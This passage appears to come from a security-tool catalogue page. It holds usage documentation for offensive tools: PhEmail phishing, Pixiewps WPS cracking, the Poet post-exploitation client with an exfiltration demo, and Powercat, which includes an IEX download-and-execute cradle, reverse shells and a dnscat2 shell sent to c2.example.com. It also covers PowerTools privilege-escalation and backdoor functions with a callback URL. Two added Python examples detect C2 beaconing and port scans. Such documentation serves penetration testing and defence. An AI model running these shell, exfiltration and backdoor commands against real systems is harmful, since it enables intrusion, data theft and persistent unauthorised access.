          -c    clone: Clone a web page
          -w    website: where the phishing email link points to
          -o    save output in a file
          -F    Format (Default: 0): 
                0- firstname surname
                1- firstname.surname@example.com
                2- firstnamesurname@example.com
                3- f.surname@example.com
                4- firstname.s@example.com
                5- surname.firstname@example.com
                6- s.firstname@example.com
                7- surname.f@example.com
                8- surnamefirstname@example.com
                9- firstname_surname@example.com 

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
          phemail.py -S example -d example.com -F 1 -p 12
          phemail.py -c https://example.com


Disclaimer

Usage of PhEmail for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.


Download PhEmail

Pixiewps - Bruteforce Offline the WPS Pin (Pixie Dust Attack)


Pixiewps is a tool written in C used to brute-force the WPS PIN offline by exploiting the low or non-existent entropy of some APs (Pixie Dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

DEPENDENCIES
Pixiewps requires libssl. To install it:
    sudo apt-get install libssl-dev

INSTALLATION
Pixiewps can be built and installed by running:
    ~/pixiewps$ cd src
    ~/pixiewps/src$ make
    ~/pixiewps/src$ sudo make install

USAGE
 Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke           : Enrollee public key
    -r, --pkr           : Registrar public key
    -s, --e-hash1       : Enrollee Hash1
    -z, --e-hash2       : Enrollee Hash2
    -a, --authkey       : Authentication session key

 Optional Arguments:

    -n, --e-nonce       : Enrollee nonce
    -m, --r-nonce       : Registrar nonce
    -b, --e-bssid       : Enrollee BSSID
    -S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)   [No]
    -f, --force         : Bruteforce the whole keyspace                [No]
    -v, --verbosity     : Verbosity level 1-3, 1 is quietest            [3]

    -h, --help          : Display this usage screen


USAGE EXAMPLE
A common usage example is:
    pixiewps --pke <pke> --pkr <pkr> --e-hash1 <e-hash1> --e-hash2 <e-hash2> --authkey <authkey> --e-nonce <e-nonce>
which requires a modified version of Reaver or Bully that prints the AuthKey. The recommended version is reaver-wps-fork-t6x.
If the following message is shown:
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.

DESCRIPTION OF ARGUMENTS
    -e, --pke

        Enrollee's DH public key, found in M1.

    -r, --pkr

        Registrar's DH public key, found in M2 or can be avoided by specifying
        --dh-small in both Reaver and Pixiewps.

    -s, --e-hash1

        Enrollee Hash-1, found in M3.

    -z, --e-hash2

        Enrollee Hash-2, found in M3.

    -a, --authkey

        Registration Protocol authentication session key. Although for this parameter a
        modified version of Reaver or Bully is needed, it can be avoided by specifying
        small Diffie-Hellman keys in both Reaver and Pixiewps and supplying --e-nonce,
        --r-nonce and --e-bssid.

    -n, --e-nonce

        Enrollee's nonce, found in M1.

    -m, --r-nonce

        Registrar's nonce, found in M2.

    -b, --e-bssid

        Enrollee's BSSID.

    -S, --dh-small

        Small Diffie-Hellman keys. The same option MUST be specified in Reaver
        (1.3 or later versions) too. This option should be avoided when possible.

    -f, --force

        Force Pixiewps to bruteforce the whole keyspace (only for one type of PRNG).
        It could take up to several minutes to complete.

    -v, --verbosity

        Verbosity level (1-3). Level 3 displays the most information.

    -h, --help

        Display usage screen.


Download Pixiewps

Plecost - Wordpress Vulnerabilities Finder


Plecost is a vulnerability fingerprinting and vulnerability finder for the WordPress blog engine.

Why?
There are a huge number of WordPress sites around the world. Most of them are exposed to attack and can be turned into a virus, malware or illegal porn provider without the knowledge of the blog owner.
This project tries to help sysadmins and blog owners make their WordPress a bit more secure.

What's new?
This Plecost 3 version adds a lot of new features and fixes, such as:
  • Fixed a lot of bugs.
  • New engine: no threads and no dependencies, yet it runs much faster. It uses Python 3 asyncio and non-blocking connections, and it consumes less memory. Incredible, right? :)
  • Changed CVE update system and storage: Plecost now gets vulnerabilities directly from NIST and creates a local SQLite database with the information filtered for WordPress and its plugins.
  • WordPress vulnerabilities: Plecost now also manages WordPress core vulnerabilities (not only plugin ones).
  • The local vulnerability database is queryable: you can look up the vulnerabilities for a specific WordPress version or plugin without running a scan, using only the local database.
You can read the entire list in the CHANGELOG file.

Installation
Installing Plecost is easy:
$ python3 -m pip install plecost
Remember that Plecost3 only runs in Python 3.

Quick start
Scanning a web site is simple:
$ plecost http://SITE.com
A slightly more complex scan: increased verbosity, exporting results in JSON or XML format:
JSON
$ plecost -v http://SITE.com -o results.json
XML
$ plecost -v http://SITE.com -o results.xml

Advanced scan options
Don't check the WordPress version, scan only plugins:
$ plecost -nc http://SITE.com 
Force the scan, even if WordPress was not detected:
$ plecost -f http://SITE.com
Display only the short banner:
$ plecost -nb http://SITE.com
List available wordlists:
$ plecost -nb -l 

// Plecost - Wordpress finger printer Tool - v1.0.0

Available word lists:
   1 - plugin_list_10.txt
   2 - plugin_list_100.txt
   3 - plugin_list_1000.txt
   4 - plugin_list_250.txt
   5 - plugin_list_50.txt
   6 - plugin_list_huge.txt
Select a wordlist in the list:
$ plecost -nb -w plugin_list_10.txt http://SITE.com
Increasing concurrency (USE THIS OPTION WITH CAUTION. IT CAN TAKE DOWN THE TESTED SITE!):
$ plecost --concurrency 10 http://SITE.com
Or...
$ plecost -c 10 http://SITE.com
For more options, consult the --help output:
$ plecost -h

Updating
New versions and vulnerabilities are released daily; you can update the local database by running:
Updating vulnerability database:
$ plecost --update-cve
Updating plugin list:

$ plecost --update-plugins

ScreenShots


Download Plecost

Poet - A simple Post-Exploitation Tool


The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self destruct

Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy). Make sure you have the python2.7 and zip executables available.
$ git clone https://github.com/mossberg/poet
$ cd poet
$ make
This will create a bin/ directory which contains poet-client and poet-server.

Usage

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily try it out, a typical invocation would look like:

Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
Note: By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).
Of course, using the -h flag gives you the full usage.
$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]

positional arguments:
  IP                    server
  INTERVAL              (s)

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --verbose
  -d, --delete          delete client upon execution

$ ./poet-server -h
usage: poet-server [-h] [-p PORT]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT

Demo

This is just a small sample of what poet can do.
The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client (in verbose mode ;). He/she does not have the server running at this point, but it's ok, the client waits patiently. Eventually the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then he/she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server.
Victim's Machine (5.4.3.2):
$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443. Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[!] (2015-03-27 03:40:22.263161) Server is inactive
[!] (2015-03-27 03:40:32.267308) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
[!] (2015-03-27 03:41:07.145979) Server is inactive
[!] (2015-03-27 03:41:17.150634) Server is inactive
[!] (2015-03-27 03:41:27.155614) Server is inactive
[!] (2015-03-27 03:41:37.160440) Server is inactive

Attacker's Machine (1.2.3.4):
# ./poet-server
                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By: ('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/passwd-201503274054.txt
psh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.
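The demo above shows the one thing a Poet client cannot hide from the network: it retries the server on a fixed interval whether or not the server answers. As an added example (not part of Poet), the following detector looks for that rhythm in a constructed connection log whose "timestamp src -> dst:port" format is invented for the example; the 5.4.3.2 -> 1.2.3.4:443 series mirrors the demo, including the 25 s pause while the control shell held the connection open.

```python
"""Beacon-interval detection over a constructed connection log (added example,
not part of Poet).  Poet's client reconnects to its server on a fixed interval
whether or not the server is up, so the outbound attempts leave an evenly spaced
trail in firewall or flow logs; this heuristic looks for that regularity."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log lines in a made-up "timestamp src -> dst:port" format.  The
# 5.4.3.2 -> 1.2.3.4:443 series mirrors the demo: an attempt every 10 s, with
# one 25 s gap while the control-shell session held the connection open.  The
# 203.0.113.x destinations are irregular, browsing-like traffic for contrast.
LOG = """\
2015-03-27 03:40:05 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:40:07 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:40:12 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:40:22 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:40:31 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:40:32 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:40:33 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:40:42 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:41:02 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:41:07 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:41:17 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:41:20 5.4.3.2 -> 203.0.113.20:80
2015-03-27 03:41:27 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:41:37 5.4.3.2 -> 1.2.3.4:443
2015-03-27 03:41:50 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:41:51 5.4.3.2 -> 203.0.113.10:443
2015-03-27 03:41:55 5.4.3.2 -> 203.0.113.20:80
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) -> (\S+):(\d+)$")


def parse_log(text):
    """Group connection timestamps by (src, dst, dport); unparseable lines are skipped."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        flows[(m.group(2), m.group(3), int(m.group(4)))].append(ts)
    return flows


def find_beacons(flows, min_events=6, tolerance=0.2, min_regularity=0.75):
    """Flag flows whose inter-connection gaps cluster around one period.

    The median gap is taken as the candidate period, so a single long pause (an
    interactive session, a reboot) does not hide the rhythm the way a mean would.
    regularity is the fraction of gaps within +/- tolerance of that period."""
    beacons = []
    for (src, dst, dport), times in flows.items():
        if len(times) < min_events:
            continue                       # too few samples to judge a rhythm
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        if period <= 0:
            continue
        regular = sum(1 for g in gaps if abs(g - period) <= tolerance * period)
        regularity = regular / len(gaps)
        if regularity >= min_regularity:
            beacons.append({"src": src, "dst": dst, "dport": dport,
                            "count": len(times), "period_s": period,
                            "regularity": round(regularity, 2)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse_log(LOG)):
        print(f"{b['src']} -> {b['dst']}:{b['dport']} every ~{b['period_s']:.0f}s "
              f"({b['count']} connections, regularity {b['regularity']})")
```

Only the 1.2.3.4:443 flow is reported (period 10 s, 6 of 7 gaps on-period); the browsing-like flow has no dominant gap and the two-event flow is below min_events. A client that randomises its interval would need a looser tolerance, at the cost of more false positives.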


Download Poet

PortDog - Simple Python Script to Detect Port Scanning Techniques


PortDog is a network anomaly detector aimed at detecting port scanning techniques. It is entirely written in Python and has an easy-to-use interface. It was tested on Ubuntu 15. Please note that it does not work on Windows, because of problems capturing RAW packets. I am working on making this script work on both platforms. In future, I am thinking about adding firewall options that could block malicious attempts. It uses raw packets for analysis; for this reason, please ensure that you run this script from a privileged session.

Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
For example, if you want to detect for 5 minutes use:
sudo python portdog.py -t 5
For infinite detection use:
sudo python portdog.py -t 0

If you want the list of scanned ports, press CTRL+C at runtime to print the port list (if a scan happened).
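PortDog decodes raw packets and flags sources that probe many ports; the page does not show its heuristic, so the following is an added example (not PortDog's code) of one workable approach: a per-(scanner, target) sliding window over distinct destination ports, plus a classification of the probe technique from the TCP flag set. The packet records, addresses and thresholds are constructed for the example.

```python
"""Port-scan heuristics over decoded TCP headers (added example, not PortDog's code).

PortDog reads raw packets; here the decoded header fields are constructed inline
so the heuristic can run offline.  Each record is (time_s, src_ip, dst_ip, dst_port, flags).
"""
from collections import Counter, defaultdict, deque

WINDOW_S = 10.0        # look-back window per (scanner, target) pair
PORT_THRESHOLD = 15    # distinct destination ports inside the window that raise an alert


def classify_probe(flags):
    """Map a TCP flag set to the scan technique it is characteristic of."""
    f = frozenset(flags)
    if f == frozenset({"SYN"}):
        return "SYN"            # half-open (SYN) scan, or the start of a normal connect
    if not f:
        return "NULL"           # no flags set: never legitimate traffic
    if f == frozenset({"FIN"}):
        return "FIN"
    if f == frozenset({"FIN", "PSH", "URG"}):
        return "XMAS"
    if f == frozenset({"ACK"}):
        return "ACK"            # used to map firewall rule sets rather than open ports
    return "other"


def detect_scans(packets, window_s=WINDOW_S, threshold=PORT_THRESHOLD):
    """Return one alert per (src, dst) pair that probed >= threshold distinct ports
    within any window_s-second span, listing every port it touched (the list
    PortDog prints on CTRL+C) and the dominant probe technique."""
    recent = defaultdict(deque)        # (src, dst) -> deque of (time, port) inside the window
    seen_ports = defaultdict(set)      # (src, dst) -> every port probed, for the report
    techniques = defaultdict(Counter)  # (src, dst) -> histogram of probe techniques
    flagged = set()
    for t, src, dst, dport, flags in sorted(packets, key=lambda p: p[0]):
        key = (src, dst)
        seen_ports[key].add(dport)
        techniques[key][classify_probe(flags)] += 1
        q = recent[key]
        q.append((t, dport))
        while t - q[0][0] > window_s:  # drop probes that fell out of the window
            q.popleft()
        if len({p for _, p in q}) >= threshold:
            flagged.add(key)
    return [
        {
            "src": src,
            "dst": dst,
            "ports": sorted(seen_ports[(src, dst)]),
            "technique": techniques[(src, dst)].most_common(1)[0][0],
        }
        for src, dst in sorted(flagged)
    ]


# --- constructed traffic (all addresses are made up) -------------------------
# 1. Fast SYN scan of ports 1-20, one probe every 100 ms.
SYN_SCAN = [(0.1 * i, "10.0.0.66", "10.0.0.5", port, {"SYN"})
            for i, port in enumerate(range(1, 21))]
# 2. NULL scan of 16 ports from another host, one probe every 300 ms.
NULL_SCAN = [(5.0 + 0.3 * i, "10.0.0.99", "10.0.0.8", port, set())
             for i, port in enumerate(range(100, 116))]
# 3. Benign client: repeated connections to only three services.
BENIGN = [(1.0 * i, "10.0.0.7", "10.0.0.5", (80, 443, 22)[i % 3], {"SYN"})
          for i in range(12)]
# 4. Slow scan: 30 ports, one probe every 4 s.  Only three probes ever share a
#    10-second window, so the default threshold misses it (a known weakness of
#    window-based detection; widen window_s to catch it).
SLOW_SCAN = [(4.0 * i, "10.0.0.23", "10.0.0.9", port, {"SYN"})
             for i, port in enumerate(range(1, 31))]
PACKETS = SYN_SCAN + NULL_SCAN + BENIGN + SLOW_SCAN

if __name__ == "__main__":
    for alert in detect_scans(PACKETS):
        print(f"{alert['src']} -> {alert['dst']}: {alert['technique']} scan, "
              f"{len(alert['ports'])} ports: {alert['ports']}")
```

With the defaults the SYN and NULL scans are reported and the benign client is not; the slow scan only shows up once window_s is widened, which is the trade-off a tool like PortDog makes between catching patient scanners and raising alerts on busy but legitimate hosts.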


Download PortDog

PortExpert - Monitors all applications connected to the Internet


PortExpert gives you a detailed view of your personal computer's cybersecurity. It automatically monitors all applications connected to the Internet and gives you all the information you might need to identify potential threats to your system.

Features
  • Monitors applications using TCP/UDP communications
  • User-friendly interface
  • Identifies remote servers (WhoIs service)
  • Opens the containing folder of any application
  • Easy online search for more information
  • Automatic identification of the related service: FTP, HTTP, HTTPS, ...
  • Capability to show/hide system level processes
  • Capability to show/hide loopbacks
  • Time freeze function

Powercat - Netcat: The Powershell Version


Installation
powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
    . .\powercat.ps1
Load The Function From URL:
    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parameters:
-l      Listen for a connection.                             [Switch]
-c      Connect to a listener.                               [String]
-p      The port to connect to, or listen on.                [String]
-e      Execute. (GAPING_SECURITY_HOLE)                      [String]
-ep     Execute Powershell.                                  [Switch]
-r      Relay. Format: "-r tcp:10.1.1.1:443"                 [String]
-u      Transfer data over UDP.                              [Switch]
-dns    Transfer data over dns (dnscat2).                    [String]
-dnsft  DNS Failure Threshold.                               [int32]
-t      Timeout option. Default: 60                          [int32]
-i      Input: Filepath (string), byte array, or string.     [object]
-o      Console Output Type: "Host", "Bytes", or "String"    [String]
-of     Output File Path.                                    [String]
-d      Disconnect after connecting.                         [Switch]
-rep    Repeater. Restart after disconnecting.               [Switch]
-g      Generate Payload.                                    [Switch]
-ge     Generate Encoded Payload.                            [Switch]
-h      Print the help message.                              [Switch]

Basic Connections
By default, powercat reads input from the console and writes output to the console using Write-Host. You can change the output type to 'Bytes' or 'String' with -o.
Basic Client:
    powercat -c 10.1.1.1 -p 443
Basic Listener:
    powercat -l -p 8000
Basic Client, Output as Bytes:
    powercat -c 10.1.1.1 -p 443 -o Bytes

File Transfer
powercat can be used to transfer files back and forth using -i (Input) and -of (Output File).
Send File:
    powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Receive File:
    powercat -l -p 8000 -of C:\inputfile

Shells
powercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.
Serve a cmd Shell:
    powercat -l -p 443 -e cmd
Send a cmd Shell:
    powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
    powercat -l -p 443 -ep

DNS and UDP
powercat supports more than sending data over TCP. Specify -u to enable UDP Mode. Data can also be sent to a dnscat2 server with -dns.
Send Data Over UDP:
    powercat -c 10.1.1.1 -p 8000 -u
    powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
    powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
    powercat -dns c2.example.com -e cmd

Relays
Relays in powercat work just like traditional netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
TCP Listener to TCP Client Relay:
    powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
    powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
    powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server
    powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
    powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
    powercat -l -p 8000 -r tcp:9000

Generate Payloads
Payloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. You can use these if you don't want to use all of powercat.
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
    powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
    powercat -l -p 8000 -e cmd -ge

Misc Usage
powercat can also be used to perform portscans, and start persistent servers.
Basic TCP Port Scanner:
    (21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
    powercat -l -p 443 -i C:\inputfile -rep


Download Powercat

PowerTools - Collection Of PowerShell Projects With A Focus On Offensive Operations


Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.

This collection contains five projects:
  • PowerUp
  • PowerBreach
  • PowerPick
  • PewPewPew
  • PowerView

PowerUp

PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, vulnerable schtasks, and more.

Service Enumeration:

Get-ServiceUnquoted             -   returns services with unquoted paths that also have a space in the name
Get-ServiceFilePermission       -   returns services where the current user can write to the service binary path or its config
Get-ServicePermission           -   returns services the current user can modify

Service Abuse:

Invoke-ServiceUserAdd           -   modifies a modifiable service to create a user and add it to the local administrators
Invoke-ServiceCMD               -   execute an arbitrary command through service abuse
Write-UserAddServiceBinary      -   writes out a patched C# service binary that adds a local administrative user
Write-CMDServiceBinary          -   writes out a patched C# binary that executes a custom command
Write-ServiceEXE                -   replaces a service binary with one that adds a local administrator user
Write-ServiceEXECMD             -   replaces a service binary with one that executes a custom command
Restore-ServiceEXE              -   restores a replaced service binary with the original executable
Invoke-ServiceStart             -   starts a given service
Invoke-ServiceStop              -   stops a given service
Invoke-ServiceEnable            -   enables a given service
Invoke-ServiceDisable           -   disables a given service
Get-ServiceDetail               -   returns detailed information about a service

DLL Hijacking:

Find-DLLHijack                  -   finds .dll hijacking opportunities for currently running processes
Find-PathHijack                 -   finds service %PATH% .dll hijacking opportunities
Write-HijackDll                 -   writes out a hijackable .dll

Registry Checks:

Get-RegAlwaysInstallElevated    -   checks if the AlwaysInstallElevated registry key is set
Get-RegAutoLogon                -   checks for Autologon credentials in the registry
Get-VulnAutoRun                 -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Misc.:

Get-VulnSchTask                 -   find schtasks with modifiable target files
Get-UnattendedInstallFile       -   finds remaining unattended installation files
Get-Webconfig                   -   checks for any encrypted web.config strings
Get-ApplicationHost             -   checks for encrypted application pool and virtual directory passwords
Write-UserAddMSI                -   write out a MSI installer that prompts for a user to be added
Invoke-AllChecks                -   runs all current escalation checks and returns a report


PowerBreach

PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods, which gives the user flexibility in how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory-only methods that do not persist across a reboot without further assistance, and it is not a silver bullet when it comes to covert communications.

Helper Functions:

Add-PSFirewallRules - Adds powershell to the firewall on 65K ports. Requires Admin
Invoke-CallbackIEX - The location for the various callback mechanisms. Calls back and executes encoded payload.

Backdoors Available:

Invoke-EventLogBackdoor: Monitors for failed RDP login attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No, Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for trigger. Admin-Yes, Firewall-Yes
Invoke-LoopBackdoor: Calls back on a set interval. Admin-No, Firewall-No
Invoke-DeadUserBackdoor: Looks for a "dead" user and calls back when it does not exist. Admin-No, Firewall-No

Callback URIs Available:

http://<host:port/resource> - Perform standard http callback
https://<host:port/resource> - Perform standard https callback
dnstxt://<host> - Resolve DNS text record for host which is the payload


PowerPick

This project focuses on allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses .NET assemblies/libraries to start execution of the Powershell scripts.

Many thanks to those in the offensive powershell community. This work is not groundbreaking but hopefully will motivate offense and defense to understand the implications and the lack of protections available.

PSInject.ps1

This project provides a powershell script (psinject.ps1) which implements the Invoke-PSInject function. This script is based on Powersploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard coded into the DLL. See this script for more details.

The script that it calls back for must be base64 encoded. To do this, you can simply use the built in linux utility 'base64'.

Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://1.1.1.1/favicon.ico

ReflectivePick

This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process, not just Powershell.exe. It extends inject/migrate capabilities into powershell.

This DLL is meant to be used with PSInject.ps1, which provides the ability to modify the hardcoded callback URL, or with Metasploit after compiling or patching the URL manually.

SharpPick

This project is a .NET executable which allows execution of Powershell code through a number of methods. The script can be embedded as a resource, read from a URL, appended to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of powershell and bypass of AppLocker.

Man Page
sharppick.exe [<flag> <argument>]
flags:
-f <file> : Read script from specified file
-r <resource name> : Read script from specified resource
-d <url> : Read script from URL
-a <delimiter> : Read script appended to current binary after specified delimiter. Delimiter should be a very, very unique string

More SharpPick details here


PewPewPew

This repo contains scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server, and then post-process any results.

More details here


PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

It also implements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged in. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options.

To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with: PS> Import-Module .\powerview.psm1 or load the PowerView script by itself: PS> Import-Module .\powerview.ps1

For detailed output of underlying functionality, pass the -Debug flag to most functions.

For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.


Misc Functions:

Export-PowerViewCSV             -   thread-safe CSV append
Set-MacAttribute                -   Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile                 -   copies a local file to a remote location, matching MAC properties
Get-IPAddress                   -   resolves a hostname to an IP
Test-Server                     -   tests connectivity to a specified server
Convert-NameToSid               -   converts a given user/group name to a security identifier (SID)
Convert-SidToName               -   converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical          -   converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy                       -   enumerates local proxy settings
Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty                -   returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty            -   returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile            -   search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess    -   check if the current user context has local administrator access to a specified host
Get-DomainSearcher              -   builds a proper ADSI searcher object for a given domain
Get-ObjectAcl                   -   returns the ACLs associated with a specific active directory object
Add-ObjectAcl                   -   adds an ACL to a specified active directory object
Invoke-ACLScanner               -   enumerates ~1000+ modifiable ACLs on a specified domain
Get-GUIDMap                     -   returns a hash table of current GUIDs -> display names
Get-DomainSID                   -   return the SID for the specified domain
Invoke-ThreadedFunction         -   helper that wraps threaded invocation for other functions

net * Functions:

Get-NetDomain                   -   gets the name of the current user's domain
Get-NetForest                   -   gets the forest associated with the current user's domain
Get-NetForestDomain             -   gets all domains for the current forest
Get-NetDomainController         -   gets the domain controllers for the current computer's domain
Get-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser                     -   adds a local or domain user
Get-NetComputer                 -   gets a list of all current servers in the domain
Get-NetPrinter                  -   gets an array of all current computer objects in a domain
Get-NetOU                       -   gets data for domain organization units
Get-NetSite                     -   gets current sites in a domain
Get-NetSubnet                   -   gets registered subnets for a domain
Get-NetGroup                    -   gets a list of all current groups in a domain
Get-NetGroupMember              -   gets a list of all current users in a specified domain group
Get-NetLocalGroup               -   gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser                -   adds a local or domain user to a local or domain group
Get-NetFileServer               -   get a list of file servers used by current domain users
Get-DFSshare                    -   gets a list of all distributed file system shares on a domain
Get-NetShare                    -   gets share information for a specified server
Get-NetLoggedon                 -   gets users actively logged onto a specified server
Get-NetSession                  -   gets active sessions on a specified server
Get-NetRDPSession               -   gets active RDP sessions for a specified server (like qwinsta)
Get-LastLoggedOn                -   return the last logged on user for a target host
Get-NetProcess                  -   gets the remote processes and owners on a remote server
Get-UserEvent                   -   returns logon or TGT events from the event log for a specified host
Get-ADObject                    -   takes a domain SID and returns the user, group, or computer 
                                    object associated with it
Set-ADObject                    -   takes a SID, name, or SamAccountName to query for a specified
                                    domain object, and then sets a specified 'PropertyName' to a
                                    specified 'PropertyValue'

GPO functions

Get-GptTmpl                     -   parses a GptTmpl.inf to a custom object
Get-NetGPO                      -   gets all current GPOs for a given domain
Get-NetGPOGroup                 -   gets all GPOs in a domain that set "Restricted Groups" 
                                    on target machines
Find-GPOLocation                -   takes a user/group and maps the machines they have effective
                                    rights over through GPO enumeration and correlation
Find-GPOComputerAdmin           -   takes a computer and determines who has admin rights over it
                                    through GPO enumeration
Get-DomainPolicy                -   returns the default domain or DC policy

User-Hunting Functions:

